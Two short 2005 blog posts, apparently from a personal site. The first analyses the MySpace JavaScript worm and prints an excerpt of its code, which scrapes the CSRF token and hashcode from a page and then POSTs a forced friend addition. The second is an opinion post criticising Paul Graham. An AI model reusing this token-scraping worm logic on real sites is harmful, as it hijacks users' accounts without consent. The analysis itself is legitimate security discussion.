October 13th, 2005

  • evan

myspace worm

MySpace worm using Javascript.
That post hypothesizes that the problem is using GET instead of POST (LJ, Orkut and many other apps did this), but it looks more complicated than that. Here's a reformatted snippet of the worm code, which looks like it GETs one page, retrieves a token from it, and then does the POST to actually make the change:

function main(){
  var AN=getClientFID();
  var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;
  J=getXMLObj();
  httpSend(BH,getHome,'GET');
  xmlhttp2=getXMLObj();
  httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')
}

function processxForm(){
  if(xmlhttp2.readyState!=4){return}
  var AU=xmlhttp2.responseText;
  var AQ=getHiddenParameter(AU,'hashcode');
  var AR=getFromURL(AU,'Mytoken');
  var AS=new Array();
  AS['hashcode']=AQ;
  AS['friendID']='11851658';
  AS['submit']='Add to Friends';
  httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))
}
  • evan

paul graham

I was excited to see Paul Graham speak at OSCON, but I left disappointed. In his writing you get the hint of a smart person enjoying writing and persuasion; in person it was easier to see that he's some Harvard kid who got lucky with a startup and became the sort of megalomaniac you'd expect. And with that in mind, his writing took on a completely new tone.

So it was refreshing to stumble across this analysis of Hackers and Painters by a Real Painter who calls bullshit on the whole thing.

(Speaking of calling bullshit, this week's Everybody loves Eric Raymond was hilarious.)